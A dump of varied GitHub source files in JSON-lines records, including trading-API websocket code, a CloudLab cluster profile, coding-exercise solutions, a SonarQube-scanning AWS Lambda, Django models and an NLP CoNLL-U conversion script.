120:\n# print(f'sent {direction} trade')\n\n# To Stream prices\nws_url = 'wss://data.alpaca.markets'\nconn = tradeapi.stream2.StreamConn(\n api_key_id, api_secret, base_url=base_url, data_url=ws_url, data_stream='alpacadatav1'\n)\n\nprint(\"Bees Hunt\")\n@conn.on(r'^account_updates$')\nasync def on_account_updates(conn, channel, account):\n print('account', account)\n\n@conn.on(r'^trade_updates$')\nasync def on_trade_updates(conn, channel, trade):\n print('trade', trade)\n\n# updates for every trade / at what price\n@conn.on(r'^T.AAPL$') # updates for every trade / at what price\nasync def trade_info(conn, channel, bar):\n print('bars', bar)\n print(bar._raw)\n\n# return bid/ask\n@conn.on(r'^Q.AAPL$')\nasync def quote_info(conn, channel, bar):\n print('bars', bar)\n\n# 1 min bar\n@conn.on(r'^AM.AAPL$')\nasync def on_minute_bars(conn, channel, bar):\n print('bars', bar)\n\ndef ws_start():\n\tconn.run(['account_updates', 'trade_updates'])\n\n#start WebSocket in a thread\nws_thread = threading.Thread(target=ws_start, daemon=True)\nws_thread.start()\n\n\n\n\n\n\n","repo_name":"nafets33/pollenq","sub_path":"pollen-main/archive/websocket_failed.py","file_name":"websocket_failed.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26764659415","text":"#!/usr/bin/env python\n\nkube_description= \\\n\"\"\"\nDevelopment Cluster\n\"\"\"\nkube_instruction= \\\n\"\"\"\nAuthor: Jon Larrea\n\"\"\"\n\n\nimport geni.portal as portal\nimport geni.rspec.pg as PG\nimport geni.rspec.igext as IG\n\n\npc = portal.Context()\nrspec = PG.Request()\n\n\n# Profile parameters.\npc.defineParameter(\"machineNum\", \"Number of Machines\",\n portal.ParameterType.INTEGER, 1)\npc.defineParameter(\"Hardware\", \"Machine Hardware\",\n portal.ParameterType.STRING,\"d430\",[(\"d430\",\"d430\"),(\"d710\",\"d710\"), (\"d820\", \"d820\"), (\"pc3000\", \"pc3000\"), (\"d740\", \"d740\"), (\"d840\", \"d840\")])\npc.defineParameter(\"OS\", \"Operating 
System\",\n portal.ParameterType.STRING,\"ubuntu18\",[(\"ubuntu18\",\"ubuntu18\"),(\"ubuntu20\",\"ubuntu20\"), (\"ubuntu22\", \"ubuntu22\")])\n\n# Isolated CPU parameters\npc.defineParameter(\"isolcpusNumber\", \"Number of Isolated CPUs\",\n portal.ParameterType.INTEGER, 0,\n advanced=True)\n\n# Kubernetes parameters\npc.defineParameter(\"k8s\", \"Install Kubernetes\",\n portal.ParameterType.BOOLEAN, False,\n advanced=True)\n\n# USRP Node\nusrp_b210_locations = [\n (\"none\",\n \"No USRP\"),\n (\"web\",\n \"WEB\"),\n (\"bookstore\",\n \"Bookstore\"),\n (\"humanities\",\n \"Humanities\"),\n (\"law73\",\n \"Law 73\"),\n (\"ebc\",\n \"EBC\"),\n (\"madsen\",\n \"Madsen\"),\n (\"sagepoint\",\n \"Sage Point\"),\n (\"moran\",\n \"Moran\"),\n (\"cpg\",\n \"Central Parking Garage\"),\n (\"guesthouse\",\n \"Guest House\"),\n]\n\npc.defineParameter(\"usrpb210\", \"USRP B210 Location\",\n portal.ParameterType.STRING, \"none\", usrp_b210_locations, advanced=True)\n\n\nparams = pc.bindParameters()\n\n#\n# Give the library a chance to return nice JSON-formatted exception(s) and/or\n# warnings; this might sys.exit().\n#\npc.verifyParameters()\n\n\n\ntour = IG.Tour()\ntour.Description(IG.Tour.TEXT,kube_description)\ntour.Instructions(IG.Tour.MARKDOWN,kube_instruction)\nrspec.addTour(tour)\n\n\n# Network\nnetmask=\"255.255.255.0\"\nnetwork = rspec.Link(\"Network\")\nnetwork.link_multiplexing = True\nnetwork.vlan_tagging = True\nnetwork.best_effort = True\n\nif params.OS == 'ubuntu20':\n os = 'urn:publicid:IDN+emulab.net+image+emulab-ops:UBUNTU20-64-STD'\nelif params.OS == 'ubuntu22':\n os = 'urn:publicid:IDN+emulab.net+image+emulab-ops//UBUNTU22-64-BETA'\nelse:\n os = 'urn:publicid:IDN+emulab.net+image+emulab-ops:UBUNTU18-64-STD'\n\n# Variable that stores configuration scripts and arguments\nprofileConfigs = \"\"\n\n# Kubernetes configuration\nk8s_ip = 0 # This is to calculate the IPs when K8s is installed\nif params.k8s == True:\n # Declare the master node\n master = rspec.RawPC(\"master\")\n master.hardware_type = params.Hardware\n master.routable_control_ip = True\n master.disk_image = os\n iface = master.addInterface()\n iface.addAddress(PG.IPv4Address(\"192.168.1.1\", netmask))\n network.addInterface(iface)\n master.addService(PG.Execute(shell=\"bash\", command=\"/local/repository/scripts/master.sh\"))\n k8s_ip = 1\n # Configure script for the slave nodes\n profileConfigs += \"PROFILE_CONF_COMMAND_K8S='/local/repository/scripts/slave.sh' \"\n\n# IsolCPU configuration\nif params.isolcpusNumber > 0:\n profileConfigs += \"PROFILE_CONF_COMMAND_ISOLCPU='/local/repository/scripts/isolcpus.sh' \"\n profileConfigs += \"PROFILE_CONF_COMMAND_ISOLCPU_ARGS='%d' \" % (params.isolcpusNumber)\nelse:\n profileConfigs += \"PROFILE_CONF_COMMAND_NOREBOOT='touch' \"\n profileConfigs += \"PROFILE_CONF_COMMAND_NOREBOOT_ARGS='/local/.noreboot' \"\n\n# Machines\nfor i in range(0,params.machineNum):\n node = rspec.RawPC(\"node\" + str(i))\n node.disk_image = os\n node.addService(PG.Execute(shell=\"bash\", command=profileConfigs + \"/local/repository/scripts/configure.sh\"))\n node.hardware_type = params.Hardware\n iface = node.addInterface()\n iface.addAddress(PG.IPv4Address(\"192.168.1.\"+str(i+1+k8s_ip), netmask))\n network.addInterface(iface)\n\nif params.usrpb210 != 'none':\n b210_nuc_pair_node = rspec.RawPC(\"b210-%s-%s\"%(params.usrpb210, \"nuc2\"))\n agg_full_name = \"urn:publicid:IDN+%s.powderwireless.net+authority+cm\"%(params.usrpb210)\n b210_nuc_pair_node.component_manager_id = agg_full_name\n 
b210_nuc_pair_node.component_id = \"nuc2\"\n b210_nuc_pair_node.disk_image = os\n\n#\n# Print and go!\n#\npc.printRequestRSpec(rspec)\n","repo_name":"j0lama/compute-server","sub_path":"profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10623637107","text":"# import collections\n# def solution(genres, plays):\n# answer = []\n# #fave = collections.Counter(genres)\n \n# result = [[g, p] for g, p in zip(genres, plays)]\n# #fave = collections.Counter([result[i][0] for i in range(len(result))])\n# print(result)\n \n# genre_dict = collections.defaultdict(int)\n\n# for item in result:\n# genre = item[0]\n# value = item[1]\n# genre_dict[genre] += value\n\n# sum = [[genre, value] for genre, value in genre_dict.items()]\n# print(sum)\n# #return answer\n\n\nfrom collections import defaultdict\n\ndef solution(genres, plays):\n answer = []\n \n genres_order = defaultdict(int)\n genres_plays = defaultdict(list)\n \n for i, (genre, v) in enumerate(zip(genres, plays)):\n genres_order[genre] += v\n genres_plays[genre].append((i, v))\n \n for genre, _ in sorted(genres_order.items(), key = lambda x: x[1], reverse = True):\n for i, v in sorted(genres_plays[genre], key = lambda x: x[1], reverse = True)[:2]:\n answer.append(i)\n \n return answer","repo_name":"examplezi/Programmers","sub_path":"프로그래머스/lv3/42579. 베스트앨범/베스트앨범.py","file_name":"베스트앨범.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983253377","text":"# 문제 설명\n# 정수 n을 입력받아 n의 약수를 모두 더한 값을 리턴하는 함수, solution을 완성해주세요.\n\n# 제한사항\n# n은 0이상 3000이하인 정수입니다.\n\n# 입출력 예\n# n return\n# 12 28\n# 5 6\n\ndef solution(n):\n answer = 0\n aliqout_list = []\n if n > 1:\n for num in range(1, n):\n if n % num == 0:\n aliqout_list.append(n // num)\n aliqout_list.append(num)\n answer = sum(set(aliqout_list))\n elif n == 1:\n answer = 1\n else:\n answer = 0\n return answer \n\ndef init():\n n = int(input())\n print(solution(n))\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/programmers/약수의합.py","file_name":"약수의합.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23669730958","text":"import unittest\n\n# Enthought library imports\nimport enthought.sweet_pickle as sweet_pickle\nfrom enthought.sweet_pickle.global_registry import _clear_global_registry\n\n\n##############################################################################\n# Classes to use within the tests\n##############################################################################\n\n# Need complete package name so that mapping matches correctly.\n# The problem here is the Python loader that will load the same module with\n# multiple names in sys.modules due to relative naming. 
Nice.\nfrom enthought.sweet_pickle.tests.class_mapping_classes import Foo, Bar, Baz\n\n##############################################################################\n# class 'ClassMappingTestCase'\n##############################################################################\n\nclass ClassMappingTestCase(unittest.TestCase):\n \"\"\" Tests the class mapping functionality of the enthought.sweet_pickle\n framework.\n \"\"\"\n\n ##########################################################################\n # 'TestCase' interface\n ##########################################################################\n\n ### public interface #####################################################\n\n def setUp(self):\n \"\"\" Creates the test fixture.\n\n Overridden here to ensure each test starts with an empty global\n registry.\n \"\"\"\n # Clear the global registry\n _clear_global_registry()\n\n # Cache a reference to the new global registry\n self.registry = sweet_pickle.get_global_registry()\n\n\n ##########################################################################\n # 'ClassMappingTestCase' interface\n ##########################################################################\n\n ### public interface #####################################################\n\n def test_infinite_loop_detection(self):\n \"\"\" Validates that the class mapping framework detects infinite\n loops of class mappings.\n \"\"\"\n # Add mappings to the registry\n self.registry.add_mapping_to_class(Foo.__module__, Foo.__name__,\n Bar)\n self.registry.add_mapping_to_class(Bar.__module__, Bar.__name__,\n Baz)\n self.registry.add_mapping_to_class(Baz.__module__, Baz.__name__,\n Foo)\n\n # Validate that an exception is raised when trying to unpickle an\n # instance anywhere within the circular definition.\n def fn(o):\n sweet_pickle.loads(sweet_pickle.dumps(o))\n self.assertRaises(sweet_pickle.UnpicklingError, fn, Foo())\n self.assertRaises(sweet_pickle.UnpicklingError, fn, Bar())\n self.assertRaises(sweet_pickle.UnpicklingError, fn, Baz())\n\n\n def test_unpickled_class_mapping(self):\n\n # Add the mappings to the registry\n self.registry.add_mapping_to_class(Foo.__module__, Foo.__name__,\n Bar)\n self.registry.add_mapping_to_class(Bar.__module__, Bar.__name__,\n Baz)\n\n # Validate that unpickling the first class gives us an instance of\n # the third class.\n start = Foo()\n end = sweet_pickle.loads(sweet_pickle.dumps(start))\n self.assertEqual(True, isinstance(end, Baz))\n\n # Validate that unpickling the second class gives us an instance of\n # the third class.\n start = Bar()\n end = sweet_pickle.loads(sweet_pickle.dumps(start))\n self.assertEqual(True, isinstance(end, Baz))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n### EOF ######################################################################\n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/AppTools/enthought/sweet_pickle/tests/class_mapping_test_case.py","file_name":"class_mapping_test_case.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"38933342408","text":"#!/usr/bin/python3.6\n# -*- coding: utf-8 -*-\n# @Author : 张晓辉\n# @Email : husterzxh@foxmail.com\n# @GitHub : https://github.com/husterzxh\n# @Blog : https://www.cnblogs.com/husterzxh/\n# @Time : 2019/7/20 19:07\n# @File : NodeClassification.py\n# @Software : PyCharm\n# 对embedding的结果进行节点分类\nimport numpy\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import 
f1_score\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\n\nclass TopKRanker(OneVsRestClassifier):\n def predict(self, X, top_k_list):\n probs = numpy.asarray(super(TopKRanker, self).predict_proba(X))\n all_labels = []\n for i, k in enumerate(top_k_list):\n probs_ = probs[i, :]\n labels = self.classes_[probs_.argsort()[-k:]].tolist()\n probs_[:] = 0\n probs_[labels] = 1\n all_labels.append(probs_)\n return numpy.asarray(all_labels)\n\n\nclass Classifier(object):\n def __init__(self, train_embeddings, test_embeddings, clf):\n self.train_embeddings = train_embeddings\n self.test_embeddings = test_embeddings\n self.clf = TopKRanker(clf)\n self.binarizer = MultiLabelBinarizer(sparse_output=True)\n\n def train(self, Y_all):\n self.binarizer.fit(Y_all)\n X_train = []\n Y_train = []\n for node, embeddings in self.train_embeddings.items():\n X_train.append(embeddings)\n Y_train.append(Y_all[int(node)])\n Y = self.binarizer.transform(Y_train)\n self.clf.fit(X_train, Y)\n\n def evaluate(self, Y):\n list_test_embedding = []\n Y_test = []\n for node, embeddings in self.test_embeddings.items():\n list_test_embedding.append(embeddings)\n Y_test.append(Y[int(node)])\n\n top_k_list = [len(l) for l in Y_test]\n Y_ = self.predict(top_k_list)\n Y_test = self.binarizer.transform(Y_test)\n averages = [\"micro\", \"macro\"]\n results = {}\n for average in averages:\n results[average] = f1_score(Y_test, Y_, average=average)\n return results\n\n def predict(self, top_k_list):\n list_test_embedding = []\n for node, embeddings in self.test_embeddings.items():\n list_test_embedding.append(embeddings)\n X_ = numpy.asarray(list_test_embedding)\n Y = self.clf.predict(X_, top_k_list=top_k_list)\n return Y\n\n def split_train_evaluate(self, Y, seed=0):\n state = numpy.random.get_state()\n numpy.random.seed(seed)\n\n self.train(Y)\n numpy.random.set_state(state)\n return self.evaluate(Y)\n\n\ndef read_node_label(filename, skip_head=False):\n fin = open(filename, 'r')\n X = []\n Y = []\n if skip_head:\n fin.readline()\n while 1:\n l = fin.readline()\n if l == '':\n break\n vec = l.strip().split(' ')\n X.append(vec[0])\n Y.append(vec[1:])\n fin.close()\n return X, Y\n\n\ndef evaluate_embeddings(train_embeddings, test_embeddings):\n X, Y = read_node_label('./data/cora/cora_labels.txt')\n str_result = ''\n clf = Classifier(train_embeddings=train_embeddings, test_embeddings=test_embeddings, clf=LogisticRegression())\n str_result = str_result + str(clf.split_train_evaluate(Y)) + '\\n'\n return str_result\n\nif __name__ == '__main__':\n for i in range(1, 10):\n int_all_round = 2\n float_ratio = round(i * 0.1, 1)\n\n # 读取train结果数据\n file_train_embedding_result = r'./data/' + str(float_ratio) + '/train_node_embedding_' + str(int_all_round) \\\n + '_' + str(float_ratio) + '.embedding'\n with open(file_train_embedding_result, 'r', encoding='utf-8') as fp1:\n list_train_embedding = fp1.read().split('\\n')\n del list_train_embedding[-1]\n dict_train_node_embedding = dict()\n for item_train_embedding in list_train_embedding:\n list_train_node_embedding = item_train_embedding.split(' ')\n str_key = list_train_node_embedding[0]\n list_value = list_train_node_embedding[1:]\n list_value = [float(i) for i in list_value]\n dict_train_node_embedding[str_key] = list_value\n\n # 读取test结果数据\n file_test_embedding_result = r'./data/' + str(float_ratio) + '/test_node_embedding_' + str(int_all_round) \\\n + '_' + str(float_ratio) + '.embedding'\n with open(file_test_embedding_result, 'r', 
encoding='utf-8') as fp1:\n list_test_embedding = fp1.read().split('\\n')\n del list_test_embedding[-1]\n dict_test_node_embedding = dict()\n for item_test_embedding in list_test_embedding:\n list_test_node_embedding = item_test_embedding.split(' ')\n str_key = list_test_node_embedding[0]\n list_value = list_test_node_embedding[1:]\n list_value = [float(i) for i in list_value]\n dict_test_node_embedding[str_key] = list_value\n\n str_result_f1 = str(float_ratio) + ' ' + evaluate_embeddings(dict_train_node_embedding, dict_test_node_embedding)\n file_result = r'./data/classification_f1.txt'\n with open(file_result, 'a', encoding='utf-8') as fp2:\n fp2.write(str_result_f1)\n print(str_result_f1)\n\n\n\n","repo_name":"husterzxh/StreamNode2Vec","sub_path":"NodeClassification.py","file_name":"NodeClassification.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70020588008","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom imagekit.models import ProcessedImageField\nfrom imagekit.processors import Thumbnail\nfrom django.conf import settings\n\n# Create your models here.\nclass User(AbstractUser):\n followings = models.ManyToManyField(\n \"self\", symmetrical=False, related_name=\"followers\"\n )\n image = ProcessedImageField(\n upload_to=\"images/\",\n blank=True,\n processors=[Thumbnail(60, 60)],\n format=\"JPEG\",\n options={\"quality\": 90},\n )\n\n @property\n def full_name(self):\n return f\"{self.last_name}{self.first_name}\"\n\n\nclass Profile(models.Model):\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name=\"user_pk\"\n )\n image = ProcessedImageField(\n blank=True,\n processors=[Thumbnail(200, 300)],\n format=\"JPEG\",\n options={\"quality\": 50},\n )\n","repo_name":"astroastrum/Django","sub_path":"test_1028/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"75039050408","text":"def mergeSort(list):\n #divide part\n if len(list) > 1: #base case for recursive call\n mid = len(list)//2\n left_list = list[:mid]\n right_list = list[mid:]\n\n mergeSort(left_list)\n mergeSort(right_list)\n\n #merge part\n i, j, k = 0, 0, 0\n\n while i= 7:\n return True\n else:\n return False\n\n# The lambda function requires git layer, checkout template.yml\ndef lambda_handler(event, context):\n # Show info for debuging purpose\n print(event)\n \n # Get owner and repo from event\n repo = event['repo']\n owner = event['owner']\n lambda_status = \"pending\"\n shoud_analysis = shoud_analysis_project(owner=owner, repo=repo)\n\n if shoud_analysis is True:\n # Send Command to ec2 instance\n github_url = f\"https://www.github.com/{owner}/{repo}\"\n ssm_response = ssm.send_command( \n InstanceIds=[ sonarqube_name ], \n DocumentName='AWS-RunShellScript', \n Comment=f'{github_url}: clone source code and scan by sonarqube', \n Parameters={\n \"commands\":[\n \"sodu su -\",\n \"cd /home/download\",\n f\"git clone {github_url}.git\",\n f\"cd {repo}\",\n \"/opt/sonar-scanner/bin/sonar-scanner \\\\\",\n \"-Dsonar.host.url=http://localhost:9000 \\\\\",\n \"-Dsonar.scm.provider=git \\\\\",\n \"-Dsonar.sources=. 
\\\\\",\n f\"-Dsonar.projectKey={owner}:{repo} \\\\\",\n f\"-Dsonar.login={sonar_username} \\\\\",\n f\"-Dsonar.password={sonar_password}\",\n \"cd ..\",\n f\"rm -rf {repo}\"\n ]\n }\n )\n \n time.sleep(3)\n \n # Get run command status\n ssm_command_id = ssm_response['Command']['CommandId']\n ssm_output = ssm.get_command_invocation(\n CommandId=ssm_command_id,\n InstanceId=sonarqube_name,\n )\n \n # Waiting command to be finished\n while (ssm_output[\"Status\"] == \"InProgress\"):\n ssm_output = ssm.get_command_invocation(\n CommandId=ssm_command_id,\n InstanceId=sonarqube_name,\n )\n \n print(ssm_output[\"Status\"])\n time.sleep(2)\n\n # Map last status and sent to queue\n print('SSM Status:', ssm_output[\"Status\"])\n status_switcher = {\n \"Pending\": \"pending\",\n \"Delayed\": \"delayed\",\n \"Success\": \"completed\",\n \"Cancelled\": \"cancelled\",\n \"TimedOut\": \"timed-out\",\n \"Failed\": \"failed\"\n }\n\n lambda_status = status_switcher.get(\n ssm_output[\"Status\"], 'failed')\n else:\n lambda_status = \"completed\"\n\n # Add queue to inform completion\n sqs.send_message(\n QueueUrl=queue_name,\n MessageBody='source_code_status',\n MessageGroupId=repo,\n MessageAttributes={\n 'function_name': {\n 'StringValue': 'get_repo_info',\n 'DataType': 'String'\n },\n 'owner': {\n 'StringValue': owner,\n 'DataType': 'String'\n },\n 'repo': {\n 'StringValue': repo,\n 'DataType': 'String'\n },\n 'status': {\n 'StringValue': lambda_status,\n 'DataType': 'String'\n }\n }\n )\n\n return respond(None, \"OK\")","repo_name":"gomstory/oss-aqm","sub_path":"sam-api/functions/get_source_code/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41462555728","text":"from discord.ext import commands\nimport aiohttp, asyncio\nfrom random import choice\n\nclass Pokemon(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.website = \"https://www.pokepedia.fr/Liste_des_Pokémon_dans_l'ordre_du_Pokédex_National\"\n \n @commands.command()\n async def pokemon(self, ctx):\n \"\"\"\n This procedure gonna get a image of pokemon ramdomly.\n \"\"\"\n \n async with aiohttp.ClientSession() as session:\n async with session.get(self.website) as r:\n if r.status == 200:\n res = []\n\n html = await r.text()\n code = html.split('\\n')\n\n for i in range(len(code)):\n ligne = code[i].split('\"')\n\n for j in range(len(ligne)):\n if len(ligne) > 2 and not(j + 2 >= len(ligne)) and ligne[j][1:] == ligne[j + 2]:\n res.append(ligne[j])\n \n # The pokemon we choose ramdomly\n which_pokemon = choice(res[12:])\n\n print(which_pokemon)\n\n\n async with session.get('https://www.pokepedia.fr' + which_pokemon) as r:\n if r.status == 200:\n res = []\n\n html = await r.text()\n code = html.split(\"\\n\")\n\n for ligne in code:\n for elmt in ligne.split('\"'):\n if '/image' in elmt and which_pokemon in elmt:\n res.append(elmt)\n \n await ctx.send(res[0])\n\nprint(int(14/13))","repo_name":"Tsurea/PigBoss_Bot","sub_path":"pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9495453903","text":"import os\nimport zlib\nimport zipfile\n\n''' 思路: 创建文件对象 - 读取文件 - 关闭文件 - 压缩 - 获得压缩结果 - 生成新文件 - 写入新文件'''\n\n#创建file对象并打开\nfileObject = open(\"shakespeare.txt\", \"r\")\nprint (\"文件名: \", fileObject.name)\n\nret = fileObject.read()\nfileObject.close()\nret = 
ret.encode()\nprint(\"压缩前大小:\", len(ret))\n# print(\"压缩前文本内容:\", ret)\n\nres = zlib.compress(ret)\nprint(\"压缩后大小:\", len(res))\nres_content = zlib.decompress(res)\nres_content = res_content.decode()\n# print(\"压缩后:\", res_content)\n\nlogName = \"log.txt\"\nlogging = open(logName, \"a+\")\nlogging.write(res_content)\nlogging.close()\n","repo_name":"pajipaji/cup","sub_path":"CompressedFile.py","file_name":"CompressedFile.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14427461198","text":"# Original Author: Theresa Schmidt, 2021 \n# Revised: Siyu Tao, 2022\n# Last Edit: 2022/07/06\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"\nCreates CoNLL-U formatted tsv files from our tagger's or parser's output files.\n\n1. tagger prediction2conllu: takes a tagging prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n2. parser prediction2conllu: takes a parsing prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n\nTested with Python 3.7\n\nReferences:\n - Lin et al. (2020).\n A recipe for creating multimodal aligned datasets for sequential tasks.\n In Proceedings of the58th Annual Meeting of the Association for Computational Linguistics, pages 4871–4884, Online.\n Association for Computational Linguistics.\n - CoNLL-U: https://universaldependencies.org/format.html\n\"\"\"\n\nimport argparse\nimport json\nfrom ast import literal_eval\nimport logging\n\n\ndef read_prediction_tokens(pred_file):\n \"\"\"\n Reads in the tokens from the tagger's output file.\n\n Returns: a String list\n \"\"\"\n tokens = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n tokens.extend(j[\"words\"])\n return tokens\n\n\ndef read_prediction_tags(pred_file):\n \"\"\"\n Reads in the predicted tags from the tagger's output file. Or the\n tags used as part of the input for the parser.\n Also determines the source of the data, i.e. 
whether it was\n generated by the tagger or the parser.\n\n Returns: a String list with the predicted tags.\n \"\"\"\n model_type = None\n tags = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n try:\n tags.extend(j[\"tags\"])\n model_type = \"tagger\"\n except KeyError:\n tags.extend(j[\"pos\"])\n model_type = \"parser\"\n return tags, model_type\n\n\ndef read_prediction_dependencies(pred_file):\n \"\"\"\n Reads in the predictions from the parser's output file.\n\n Returns: two String list with the predicted heads and dependency names, respectively.\n \"\"\"\n heads = []\n deps = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n heads.extend(j[\"predicted_heads\"])\n deps.extend(j[\"predicted_dependencies\"])\n heads = list(map(str, heads))\n return heads, deps\n\ndef taggingcolumns2conllu(outfile, tokens, tags, pos_tags=None, filemode=\"w\"):\n \"\"\"\n Takes tokens and tags and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n\n All tokens are annotated with HEAD = 0 and DEPREL = root, so the parser's\n dataset reader can read in the file without errors.\n \"\"\"\n\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n \"Will not zip tokens and tags: number of tokens in tokens and \"\n \"number of tags in tags must be the same. Got \",\n len(tokens),\n \"and\",\n len(tags),\n )\n # write file: one token per line\n with open(outfile, filemode, encoding=\"utf-8\") as o:\n if pos_tags:\n for (i, (_token, _pos, _tag)) in enumerate(zip(tokens, pos_tags, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t\"\n + _pos\n + \"\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n else:\n for (i, (_token, _tag)) in enumerate(zip(tokens, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t_\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n\n\ndef parsercolumns2conllu(outfile, tokens, tags, heads, deps, pos_tags=None, filemode=\"w\"):\n \"\"\"\n Takes tokens, tags and dependency relations and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n \"\"\"\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n f\"Will not zip tokens, tags, heads and deps: number of tokens \"\n f\"in tokens and number of tags in tags must be the same. 
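The `*columns2conllu` writers in this script assemble each 10-column CoNLL-U row through long chains of string concatenation; an equivalent construction that is easier to audit builds a column list and joins it with tabs. A minimal sketch (the example token and tag are illustrative):

```python
def conllu_row(index, token, xpos, head="0", deprel="root"):
    """One CoNLL-U line: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC."""
    cols = [str(index), token, "_", "_", xpos, "_", head, deprel, "_", "_"]
    return "\t".join(cols)

print(conllu_row(1, "Preheat", "B-A"))
# 1	Preheat	_	_	B-A	_	0	root	_	_
```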
\"\n f\"Got {len(tokens)}, {len(tags)}, {len(heads)} and {len(deps)}.\"\n )\n # write file: one token per line\n with open(outfile, filemode, encoding=\"utf-8\") as o:\n if pos_tags:\n for (i, (_token, _pos, _tag, _head, _dep)) in enumerate(\n zip(tokens, pos_tags, tags, heads, deps)\n ):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t\"\n + _pos\n + \"\\t\"\n + _tag\n + \"\\t_\\t\"\n + _head\n + \"\\t\"\n + _dep\n + \"\\t_\\t_\"\n )\n o.write(\"\\n\")\n else:\n for (i, (_token, _tag, _head, _dep)) in enumerate(\n zip(tokens, tags, heads, deps)\n ):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t_\\t\"\n + _tag\n + \"\\t_\\t\"\n + _head\n + \"\\t\"\n + _dep\n + \"\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n\ndef execute_tagger2c(args):\n \"\"\"\n Takes a prediction file generated by our tagger (i.e. json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ _ _ _ _\n \"\"\"\n if args.multi_mode:\n lineflag = False\n with open(args.pred_file, encoding=\"utf-8\") as f:\n for line in f:\n lineflag = True\n j = json.loads(line)\n tokens = j[\"words\"]\n tags = j[\"tags\"]\n taggingcolumns2conllu(args.out, tokens, tags, filemode=\"a\")\n if not lineflag:\n raise IOError(\n \"Empty file\"\n ) # Due to formatting and other errors in Lin et al. (2020)'s data,\n # some recipes do not contain text, leaving us with empty files.\n # Empty files could cause further errors; therefore, we want to delete them from the dataset.\n else:\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n taggingcolumns2conllu(args.out, tokens, tags)\n\n\ndef execute_parse2c(args):\n \"\"\"\n Takes a prediction file generated by our parser (i.e. json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ HEAD DEPREL DEPS _\n \"\"\"\n if args.multi_mode:\n # WIP - not yet tested\n lineflag = False\n with open(args.pred_file, encoding=\"utf-8\") as f:\n for line in f:\n lineflag = True\n j = json.loads(line)\n tokens = 